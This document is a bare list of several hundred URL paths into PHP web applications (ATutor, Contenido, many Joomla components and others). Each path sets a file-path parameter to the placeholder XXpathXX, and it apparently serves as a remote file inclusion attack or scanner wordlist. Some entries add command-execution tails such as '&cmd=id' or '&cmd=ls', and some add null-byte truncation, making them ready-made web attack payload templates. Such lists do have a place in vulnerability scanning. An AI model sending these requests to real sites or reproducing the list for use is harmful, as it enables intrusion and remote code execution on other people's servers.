/ATutor/documentation/common/search.php?section=XXpathXX
/ATutor/documentation/common/vitals.inc.php?req_lang=XXpathXX
/ATutor/include/classes/module/module.class.php?row[dir_name]=XXpathXX
/ATutor/include/classes/phpmailer/class.phpmailer.php?lang_path=XXpathXX
/AdaptCMS_Lite_1.4_2/plugins/rss_importer_functions.php?sitepath=XXpathXX?
/Administration/Includes/configureText.php?path_prefix=XXpathXX
/Administration/Includes/contentHome.php?path_prefix=XXpathXX
/Administration/Includes/deleteContent.php?path_prefix=XXpathXX
/Administration/Includes/deleteUser.php?path_prefix=XXpathXX
/Administration/Includes/userHome.php?path_prefix=XXpathXX
/Agora_PATH//mdweb/admin/inc/organisations/country_insert.php?chemin_appli=XXpathXX?
/Agora_PATH//mdweb/admin/inc/organisations/form_org.inc.php?chemin_appli=XXpathXX?
/BE_config.php?_PSL[classdir]=XXpathXX
/BPNEWS/bn_smrep1.php?bnrep=XXpathXX?&
/Base/Application.php?pear_dir=XXpathXX
/Bcwb_PATH/dcontent/default.css.php?root_path_admin=XXpathXX
/Bcwb_PATH/include/startup.inc.php?root_path_admin=XXpathXX
/Bcwb_PATH/system/default.css.php?root_path_admin=XXpathXX
/Beautifier/Core.php?BEAUT_PATH=XXpathXX?
/BetaBlockModules//Module/Module.php?path_prefix=XXpathXX
/BetaBlockModules/AboutUserModule/AboutUserModule.php?path_prefix=XXpathXX
/BetaBlockModules/AddGroupModule/AddGroupModule.php?path_prefix=XXpathXX
/BetaBlockModules/AddMessageModule/AddMessageModule.php?path_prefix=XXpathXX
/BetaBlockModules/AudiosMediaGalleryModule/AudiosMediaGalleryModule.php?current_blockmodule_path=XXpathXX
/BetaBlockModules/CustomizeUIModule/desktop_image.php?path_prefix=XXpathXX
/BetaBlockModules/EditProfileModule/DynamicProfile.php?path_prefix=XXpathXX
/BetaBlockModules/EditProfileModule/external.php?path_prefix=XXpathXX
/BetaBlockModules/EnableModule/EnableModule.php?path_prefix=XXpathXX
/BetaBlockModules/ExternalFeedModule/ExternalFeedModule.php?path_prefix=XXpathXX
/BetaBlockModules/FlickrModule/FlickrModule.php?path_prefix=XXpathXX
/BetaBlockModules/GroupForumModule/GroupForumModule.php?path_prefix=XXpathXX
/BetaBlockModules/GroupForumPermalinkModule/GroupForumPermalinkModule.php?path_prefix=XXpathXX
/BetaBlockModules/GroupModerateContentModule/GroupModerateContentModule.php?path_prefix=XXpathXX
/BetaBlockModules/GroupModerateUserModule/GroupModerateUserModule.php?path_prefix=XXpathXX
/BetaBlockModules/GroupModerationModule/GroupModerationModule.php?path_prefix=XXpathXX
/BetaBlockModules/GroupsCategoryModule/GroupsCategoryModule.php?path_prefix=XXpathXX
/BetaBlockModules/GroupsDirectoryModule/GroupsDirectoryModule.php?path_prefix=XXpathXX
/BetaBlockModules/ImagesMediaGalleryModule/ImagesMediaGalleryModule.php?current_blockmodule_path=XXpathXX
/BetaBlockModules/ImagesModule/ImagesModule.php?path_prefix=XXpathXX
/BetaBlockModules/InvitationStatusModule/InvitationStatusModule.php?path_prefix=XXpathXX
/BetaBlockModules/LargestGroupsModule/LargestGroupsModule.php?path_prefix=XXpathXX
/BetaBlockModules/LinksModule/LinksModule.php?path_prefix=XXpathXX
/BetaBlockModules/LoginModule/remoteauth_functions.php?path_prefix=XXpathXX
/BetaBlockModules/LogoModule/LogoModule.php?path_prefix=XXpathXX
/BetaBlockModules/MediaFullViewModule/MediaFullViewModule.php?path_prefix=XXpathXX
/BetaBlockModules/MediaManagementModule/MediaManagementModule.php?path_prefix=XXpathXX
/BetaBlockModules/MembersFacewallModule/MembersFacewallModule.php?current_blockmodule_path=XXpathXX
/BetaBlockModules/MessageModule/MessageModule.php?path_prefix=XXpathXX
/BetaBlockModules/ModuleSelectorModule/ModuleSelectorModule.php?path_prefix=XXpathXX
/BetaBlockModules/MyGroupsModule/MyGroupsModule.php?path_prefix=XXpathXX
/BetaBlockModules/MyLinksModule/MyLinksModule.php?path_prefix=XXpathXX
/BetaBlockModules/MyNetworksModule.php?path_prefix=XXpathXX
/BetaBlockModules/NetworkAnnouncementModule/NetworkAnnouncementModule.php?path_prefix=XXpathXX
/BetaBlockModules/NetworkDefaultControlModule/NetworkDefaultControlModule.php?path_prefix=XXpathXX
/BetaBlockModules/NetworkDefaultLinksModule/NetworkDefaultLinksModule.php?path_prefix=XXpathXX
/BetaBlockModules/NetworkModerateUserModule/NetworkModerateUserModule.php?path_prefix=XXpathXX
/BetaBlockModules/NetworkResultContentModule/NetworkResultContentModule.php?path_prefix=XXpathXX
/BetaBlockModules/NetworkResultUserModule/NetworkResultUserModule.php?path_prefix=XXpathXX
/BetaBlockModules/NetworksDirectoryModule/NetworksDirectoryModule.php?path_prefix=XXpathXX
/BetaBlockModules/NewestGroupsModule/NewestGroupsModule.php?current_blockmodule_path=XXpathXX
/BetaBlockModules/PeopleModule/PeopleModule.php?path_prefix=XXpathXX
/BetaBlockModules/PopularTagsModule/PopularTagsModule.php?path_prefix=XXpathXX
/BetaBlockModules/PostContentModule/PostContentModule.php?path_prefix=XXpathXX
/BetaBlockModules/ProfileFeedModule/ProfileFeedModule.php?path_prefix=XXpathXX
/BetaBlockModules/RecentCommentsModule/RecentCommentsModule.php?path_prefix=XXpathXX
/BetaBlockModules/RecentPostModule/RecentPostModule.php?path_prefix=XXpathXX
/BetaBlockModules/RecentTagsModule/RecentTagsModule.php?path_prefix=XXpathXX
/BetaBlockModules/RegisterModule/RegisterModule.php?path_prefix=XXpathXX
/BetaBlockModules/SearchGroupsModule/SearchGroupsModule.php?path_prefix=XXpathXX
/BetaBlockModules/ShowAnnouncementModule/ShowAnnouncementModule.php?path_prefix=XXpathXX
/BetaBlockModules/ShowContentModule/ShowContentModule.php?path_prefix=XXpathXX
/BetaBlockModules/TakerATourModule/TakerATourModule.php?path_prefix=XXpathXX
/BetaBlockModules/UploadMediaModule/UploadMediaModule.php?current_blockmodule_path=XXpathXX
/BetaBlockModules/UserMessagesModule/UserMessagesModule.php?path_prefix=XXpathXX
/BetaBlockModules/UserPhotoModule/UserPhotoModule.php?path_prefix=XXpathXX
/BetaBlockModules/VideosMediaGalleryModule/VideosMediaGalleryModule.php?current_blockmodule_path=XXpathXX
/BetaBlockModules/ViewAllMembersModule/ViewAllMembersModule.php?path_prefix=XXpathXX
/Blog_CMS/admin/plugins/NP_UserSharing.php?DIR_ADMIN=XXpathXX?admin
/BsiliX_path]/files/mbox-action.php3?BSX_LIBDIR=XXpathXX
/CSLH2_path/txt-db-api/util.php?API_HOME_DIR=XXpathXX?
/CheckUpload.php?Language=XXpathXX&cmd=ls
/Contenido_4.8.4/contenido/backend_search.php?contenido_path=XXpathXX?
/Contenido_4.8.4/contenido/cronjobs/move_articles.php?cfg[path][contenido]=XXpathXX?
/Contenido_4.8.4/contenido/cronjobs/move_old_stats.php?cfg[path][contenido]=XXpathXX?
/Contenido_4.8.4/contenido/cronjobs/optimize_database.php?cfg[path][contenido]=XXpathXX?
/Contenido_4.8.4/contenido/cronjobs/run_newsletter_job.php?cfg[path][contenido]=XXpathXX?
/Contenido_4.8.4/contenido/cronjobs/send_reminder.php?cfg[path][contenido]=XXpathXX?
/Contenido_4.8.4/contenido/cronjobs/session_cleanup.php?cfg[path][contenido]=XXpathXX?
/Contenido_4.8.4/contenido/cronjobs/setfrontenduserstate.php?cfg[path][contenido]=XXpathXX?
/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=XXpathXX?
/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=XXpathXX?
/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[templates][right_top_blank]=XXpathXX?
/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=XXpathXX?
/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][templates]=XXpathXX?
/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[templates][right_top_blank]=XXpathXX?
/CoupleDB.php?Parametre=0&DataDirectory=XXpathXX?
/DFF_PHP_FrameworkAPI-latest/include/DFF_affiliate_client_API.php?DFF_config[dir_include]=XXpathXX
/DFF_PHP_FrameworkAPI-latest/include/DFF_featured_prdt.func.php?DFF_config[dir_include]=XXpathXX
/DFF_PHP_FrameworkAPI-latest/include/DFF_mer.func.php?DFF_config[dir_include]=XXpathXX
/DFF_PHP_FrameworkAPI-latest/include/DFF_mer_prdt.func.php?DFF_config[dir_include]=XXpathXX
/DFF_PHP_FrameworkAPI-latest/include/DFF_paging.func.php?DFF_config[dir_include]=XXpathXX
/DFF_PHP_FrameworkAPI-latest/include/DFF_rss.func.php?DFF_config[dir_include]=XXpathXX
/DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]=XXpathXX
/DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]XXpathXX
/DON3/applications/don3_requiem.don3app/don3_requiem.php?app_path=XXpathXX
/DON3/applications/frontpage.don3app/frontpage.php?app_path=XXpathXX?
/Dir_phNNTP/article-raw.php?file_newsportal=XXpathXX?
/DynaTracker_v151/action.php?base_path=XXpathXX
/DynaTracker_v151/includes_handler.php?base_path=XXpathXX
/Easysite-2.0_path/configuration/browser.php?EASYSITE_BASE=XXpathXX?
/Ex/modules/threadstop/threadstop.php?exbb[home_path]=XXpathXX?
/Ex/modules/threadstop/threadstop.php?new_exbb[home_path]=XXpathXX?
/Exophpdesk_PATH/pipe.php?lang_file=XXpathXX
/FirstPost/block.php?Include=XXpathXX
/Flickrclient.php?path_prefix=XXpathXX
/FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=XXpathXX?
/FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=XXpathXX?
/Full_Release/include/body_comm.inc.php?content=XXpathXX
/Gallery/displayCategory.php?basepath=XXpathXX
/Include/lib.inc.php3?Include=XXpathXX?
/Include/variables.php3?Include=XXpathXX?
/Jobline/admin.jobline.php?mosConfig_absolute_path=XXpathXX
/ListRecords.php?lib_dir=XXpathXX?&cmd=id
/Lorev1/third_party/phpmailer/class.phpmailer.php?lang_path=XXpathXX
/MOD_forum_fields_parse.php?phpbb_root_path=XXpathXX
/Mamblog/admin.mamblog.php?cfgfile=XXpathXX
/Net_DNS_PATH/DNS/RR.php?phpdns_basedir=XXpathXX?
/NuclearBB/tasks/send_queued_emails.php?root_path=XXpathXX?
/OpenSiteAdmin/indexFooter.php?path=XXpathXX%00
/OpenSiteAdmin/pages/pageHeader.php?path=XXpathXX?
/OpenSiteAdmin/scripts/classes/DatabaseManager.php?path=XXpathXX%00
/OpenSiteAdmin/scripts/classes/FieldManager.php?path=XXpathXX%00
/OpenSiteAdmin/scripts/classes/Filter.php?path=XXpathXX%00
/OpenSiteAdmin/scripts/classes/Filters/SingleFilter.php?path=XXpathXX%00
/OpenSiteAdmin/scripts/classes/Form.php?path=XXpathXX%00
/OpenSiteAdmin/scripts/classes/FormManager.php?path=XXpathXX%00
/OpenSiteAdmin/scripts/classes/LoginManager.php?path=XXpathXX%00
/PHP/includes/header.inc.php?root=XXpathXX?
/PHPDJ_v05/dj/djpage.php?page=XXpathXX?
/PaTh/index.php?rootpath=XXpathXX
/Path_Script/createurl.php?formurl=XXpathXX
/PhotoCart/adminprint.php?admin_folder=XXpathXX
/Picssolution/install/config.php?path=XXpathXX?
/RGboard/include/footer.php?_path[counter]=XXpathXX?
/SPIP-v1-7-2/inc-calcul.php3?squelette_cache=XXpathXX?
/SQuery/lib/gore.php?libpath=XXpathXX
/SazCart/admin/alayouts/default/pages/login.php?_saz[settings][site_url]=XXpathXX?
/SazCart/layouts/default/header.saz.php?_saz[settings][site_dir]=XXpathXX?
/ScriptPage/source/includes/load_forum.php?mfh_root_path=XXpathXX
/ScriptPath/footers.php?tinybb_footers=XXpathXX
/ScriptPath/index.php?page=XXpathXX
/Script_Path/config.inc.php?_path=XXpathXX?
/Scripts/app_and_readme/navigator/index.php?page=XXpathXX
/Scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=XXpathXX
/Somery/team.php?checkauth=XXpathXX
/Upload/install.php?skindir=XXpathXX
/Widgets/Base/Footer.php?sys_dir=XXpathXX
/Widgets/Base/widget.BifContainer.php?sys_dir=XXpathXX
/Widgets/Base/widget.BifRoot.php?sys_dir=XXpathXX
/Widgets/Base/widget.BifRoot2.php?sys_dir=XXpathXX
/Widgets/Base/widget.BifRoot3.php?sys_dir=XXpathXX
/Widgets/Base/widget.BifWarning.php?sys_dir=XXpathXX
/WordPress_Files/All_Users/wp-content/plugins/Enigma2.php?boarddir=XXpathXX?
/[path]/mybic_server.php?file=XXpathXX
/[path]/previewtheme.php?theme=1&inc_path=XXpathXX?cmd
/_administration/securite.php?cfg[document_uri]=XXpathXX
/_blogadata/include/struct_admin.php?incl_page=XXpathXX?
/_conf/_php-core/common-tpl-vars.php?admindir=XXpathXX
/_connect.php?root=XXpathXX
/_friendly/core/data/_load.php?friendly_path=XXpathXX
/_friendly/core/data/yaml.inc.php?friendly_path=XXpathXX
/_friendly/core/display/_load.php?friendly_path=XXpathXX
/_friendly/core/support/_load.php?friendly_path=XXpathXX
/_functions.php?prefix=XXpathXX
/_includes/settings.inc.php?approot=XXpathXX
/_theme/breadcrumb.php?rootBase=XXpathXX
/_wk/wk_lang.php?WK[wkPath]=XXpathXX
/abf_js.php?abs_pfad=XXpathXX?&cmd=id
/about.php?CONFIG[MWCHAT_Libs]=XXpathXX?
/about.php?bibtexrootrel=XXpathXX?
/aboutinfo.php?bibtexrootrel=XXpathXX?
/acc.php?page=XXpathXX
/access/login.php?path_to_root=XXpathXX
/account.php?insPath=XXpathXX
/accsess/login.php?path_to_root=XXpathXX
/active/components/xmlrpc/client.php?c[components]=XXpathXX
/ad_main.php?_mygamefile=XXpathXX
/add.cgi.php?blog_theme=XXpathXX
/add_link.php?blog_theme=XXpathXX
/addpost_newpoll.php?addpoll=preview&thispath=XXpathXX
/addressbook.php?GLOBALS[basedir]=XXpathXX?
/addsite.php?returnpath=XXpathXX
/addvip.php?msetstr["PROGSDIR"]=XXpathXX
/adm/krgourl.php?DOCUMENT_ROOT=XXpathXX?
/adm/my_statistics.php?DOCUMENT_ROOT=XXpathXX?
/admin.loudmouth.php?mainframe=XXpathXX
/admin.php?Madoa=XXpathXX?
/admin.php?cal_dir=XXpathXX
/admin.php?env_dir=XXpathXX
/admin.php?lang=XXpathXX
/admin.php?page[path]=XXpathXX?&cmd=ls
/admin.php?submit=submit&form_include_template=XXpathXX
/admin/PLUGINs/NP_UserSharing.php?DIR_ADMIN=XXpathXX?admin
/admin/ST_countries.php?include_path=XXpathXX?
/admin/ST_platforms.php?include_path=XXpathXX?
/admin/addentry.php?phpbb_root_path=XXpathXX?
/admin/addons/archive/archive.php?adminfolder=XXpathXX
/admin/admin.php?path=XXpathXX
/admin/admin.php?site_url=XXpathXX
/admin/admin_forgotten_password.php?root_folder_path=XXpathXX
/admin/admin_news_bot.php?root_path=XXpathXX?
/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=XXpathXX
/admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=XXpathXX
/admin/admin_users.php?phpbb_root_path=XXpathXX
/admin/auth.php?xcart_dir=XXpathXX?
/admin/auth/secure.php?cfgProgDir=XXpathXX?
/admin/autoprompter.php?CONFIG[BASE_PATH]=XXpathXX
/admin/bin/patch.php?INSTALL_FOLDER=XXpathXX
/admin/catagory.php?language=XXpathXX
/admin/classes/pear/OLE/PPS.php?homedir=XXpathXX
/admin/classes/pear/OLE/PPS/File.php?homedir=XXpathXX
/admin/classes/pear/OLE/PPS/Root.php?homedir=XXpathXX
/admin/classes/pear/Spreadsheet/Excel/Writer.php?homedir=XXpathXX
/admin/classes/pear/Spreadsheet/Excel/Writer/BIFFwriter.php?homedir=XXpathXX
/admin/classes/pear/Spreadsheet/Excel/Writer/Format.php?homedir=XXpathXX
/admin/classes/pear/Spreadsheet/Excel/Writer/Parser.php?homedir=XXpathXX
/admin/classes/pear/Spreadsheet/Excel/Writer/Workbook.php?homedir=XXpathXX
/admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php?homedir=XXpathXX
/admin/code/index.php?load_page=XXpathXX
/admin/comment.php?config[installdir]=XXpathXX
/admin/common-menu.php?CONF[local_path]=XXpathXX
/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=XXpathXX?
/admin/config_settings.tpl.php?include_path=XXpathXX?&cmd=id
/admin/directory.php?config[installdir]=XXpathXX
/admin/doeditconfig.php?thispath=../includes&config[path]=XXpathXX
/admin/frontpage_right.php?loadadminpage=XXpathXX
/admin/header.php?loc=XXpathXX
/admin/inc/add.php?format_menue=XXpathXX
/admin/inc/change_action.php?format_menue=XXpathXX
/admin/include/common.php?commonIncludePath=XXpathXX?
/admin/include/header.php?repertoire=XXpathXX?
/admin/include/lib.module.php?mod_root=XXpathXX
/admin/includes/admin_header.php?level=XXpathXX?
/admin/includes/author_panel_header.php?level=XXpathXX?
/admin/includes/header.php?bypass_installed=1&secure_page_path=XXpathXX%00
/admin/includes/spaw/spaw_control.class.php?spaw_root=XXpathXX?
/admin/index.php?path_to_script=XXpathXX?&cmd=ls
/admin/index.php?pg=XXpathXX?
/admin/index.php?xtrphome=XXpathXX
/admin/index_sitios.php?_VIEW=XXpathXX
/admin/lib_action_step.php?GLOBALS[CLASS_PATH]=XXpathXX
/admin/login.php?absolute_path=XXpathXX
/admin/news.admin.php?path_to_script=XXpathXX?&cmd=ls
/admin/news.php?language=XXpathXX
/admin/plugins/Online_Users/main.php?GLOBALS[PT_Config][dir][data]=XXpathXX
/admin/sendmsg.php?config[installdir]=XXpathXX
/admin/setup/level2.php?dir=XXpathXX
/admin/system/config/conf-activation.php?site_path=XXpathXX
/admin/system/include.php?skindir=XXpathXX
/admin/system/include.php?start=1&skindir=XXpathXX
/admin/system/menu/item.php?site_path=XXpathXX
/admin/system/modules/conf_modules.php?site_path=XXpathXX
/admin/templates/template_thumbnail.php?thumb_template=XXpathXX
/admin/testing/tests/0004_init_urls.php?init_path=XXpathXX?&
/admin/themes.php?config[installdir]=XXpathXX
/admin/tools/utf8conversion/index.php?path=XXpathXX?
/admin/user_user.php?language=XXpathXX
/admincp/auth/checklogin.php?cfgProgDir=XXpathXX
/admincp/auth/secure.php?cfgProgDir=XXpathXX
/adminhead.php?path[docroot]=XXpathXX
/admini/admin.php?INC=XXpathXX?
/admini/index.php?INC=XXpathXX?
/administrator/admin.php?site_absolute_path=XXpathXX?
/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
/administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
/administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
/administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
/administrator/components/com_color/admin.color.php?mosConfig_live_site=XXpathXX?
/administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
/administrator/components/com_competitions/includes/competitions/competitions.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
/administrator/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=XXpathXX?
/administrator/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_events/admin.events.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=XXpathXX
/administrator/components/com_extended_registration/admin.extended_registration.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_feederator/includes/tmsp/edit_tmsp.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
/administrator/components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=XXpathXX
/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=XXpathXX
/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_jreactions/langset.php?comPath=XXpathXX?
/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=XXpathXX?
/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=XXpathXX
/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=XXpathXX
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_tour_toto/admin.tour_toto.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=XXpathXX
/administrator/components/com_webring/admin.webring.docs.php?component_dir=XXpathXX?
/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=XXpathXX
/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_wmtrssreader/admin.wmtrssreader.php?mosConfig_live_site=XXpathXX?
/administrator/menu_add.php?site_absolute_path=XXpathXX?
/administrator/menu_operation.php?site_absolute_path=XXpathXX?
/adminpanel/includes/add_forms/addmp3.php?GLOBALS[root_path]=XXpathXX
/adminpanel/includes/mailinglist/mlist_xls.php?GLOBALS[root_path]=XXpathXX?
/adodb/adodb-errorpear.inc.php?ourlinux_root_path=XXpathXX
/adodb/adodb-pear.inc.php?ourlinux_root_path=XXpathXX
/adodb/adodb.inc.php?path=XXpathXX
/advanced_comment_system/admin.php?ACS_path=XXpathXX?
/advanced_comment_system/index.php?ACS_path=XXpathXX?
/afb-3-beta-2007-08-28/_includes/settings.inc.php?approot=XXpathXX?
/agenda.php3?rootagenda=XXpathXX
/agenda2.php3?rootagenda=XXpathXX
/aides/index.php?page=XXpathXX?
/ains_main.php?ains_path=XXpathXX
/ajax/loadsplash.php?full_path=XXpathXX
/ajouter.php?include=XXpathXX?
/akarru.gui/main_content.php?bm_content=XXpathXX
/akocomments.php?mosConfig_absolute_path=XXpathXX
/amazon/cart.php?cmd=add&asin=XXpathXX
/amazon/index.php?lang=XXpathXX
/amazon/info.php?asin=XXpathXX
/annonce.php?page=XXpathXX?&cmd=id
/announcements.php?phpraid_dir=XXpathXX
/anzagien.php?config[root_ordner]=XXpathXX?cmd=id
/apbn/templates/head.php?APB_SETTINGS[template_path]=XXpathXX
/api.php?t_path_core=XXpathXX?&cmd=id
/apps/apps.php?app=XXpathXX
/appserv/main.php?appserv_root=XXpathXX
/arab3upload/customize.php?path=XXpathXX?&cmd=pwd
/arab3upload/initialize.php?path=XXpathXX?&cmd=pwd
/arash_lib/class/arash_gadmin.class.php?arashlib_dir=XXpathXX
/arash_lib/class/arash_sadmin.class.php?arashlib_dir=XXpathXX
/arash_lib/include/edit.inc.php?arashlib_dir=XXpathXX
/arash_lib/include/list_features.inc.php?arashlib_dir=XXpathXX
/archive.php?scriptpath=XXpathXX?
/aroundme/template/barnraiser_01/pol_view.tpl.php?poll=1&templatePath=XXpathXX%00
/artlist.php?root_path=XXpathXX
/assets/plugins/mp3_id/mp3_id.php?GLOBALS[BASE]=XXpathXX?cmd
/assets/snippets/reflect/snippet.reflect.php?reflect_base=XXpathXX?
/athena.php?athena_dir=XXpathXX
/auction/auction_common.php?phpbb_root_path=XXpathXX
/auction/includes/converter.inc.php?include_path=XXpathXX?
/auction/includes/messages.inc.php?include_path=XXpathXX?
/auction/includes/settings.inc.php?include_path=XXpathXX?
/auction/phpAdsNew/view.inc.php?phpAds_path=XXpathXX
/auth.cookie.inc.php?da_path=XXpathXX
/auth.header.inc.php?da_path=XXpathXX
/auth.sessions.inc.php?da_path=XXpathXX
/auth/auth.php?phpbb_root_path=XXpathXX
/auth/auth_phpbb/phpbb_root_path=XXpathXX
/authenticate.php?default_path_for_themes=XXpathXX?
/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=XXpathXX
/authentication/smf/smf.functions.php?pConfig_auth[smf_path]=XXpathXX
/auto_check_renewals.php?installed_config_file=XXpathXX?cmd=ls
/autoindex.php?cfg_file=XXpathXX?
/awzmb/adminhelp.php?Setting[OPT_includepath]=XXpathXX
/awzmb/modules/admin.incl.php?Setting[OPT_includepath]=XXpathXX
/awzmb/modules/core/core.incl.php?Setting[OPT_includepath]=XXpathXX
/awzmb/modules/gbook.incl.php?Setting[OPT_includepath]=XXpathXX
/awzmb/modules/help.incl.php?Setting[OPT_includepath]=XXpathXX
/awzmb/modules/reg.incl.php?Setting[OPT_includepath]=XXpathXX
/axoverzicht.cgi?maand=XXpathXX
/b2-tools/gm-2-b2.php?b2inc=XXpathXX
/b2verifauth.php?index=XXpathXX?
/backend/addons/links/index.php?PATH=XXpathXX
/basebuilder/src/main.inc.php?mj_config[src_path]=XXpathXX???
/bb_admin.php?includeFooter=XXpathXX
/beacon/language/1/splash.lang.php?languagePath=XXpathXX
/beacon/language/1/splash.lang.php?languagePath=XXpathXX?
/belegungsplan/jahresuebersicht.inc.php?root=XXpathXX
/belegungsplan/monatsuebersicht.inc.php?root=XXpathXX
/belegungsplan/tagesuebersicht.inc.php?root=XXpathXX
/belegungsplan/wochenuebersicht.inc.php?root=XXpathXX
/bemarket/postscript/postscript.php?p_mode=XXpathXX
/biblioteca/bib_form.php?CLASSPATH=XXpathXX
/biblioteca/bib_pldetails.php?CLASSPATH=XXpathXX
/biblioteca/bib_plform.php?CLASSPATH=XXpathXX
/biblioteca/bib_plsearchc.php?CLASSPATH=XXpathXX
/biblioteca/bib_plsearchs.php?CLASSPATH=XXpathXX
/biblioteca/bib_save.php?CLASSPATH=XXpathXX
/biblioteca/bib_searchc.php?CLASSPATH=XXpathXX
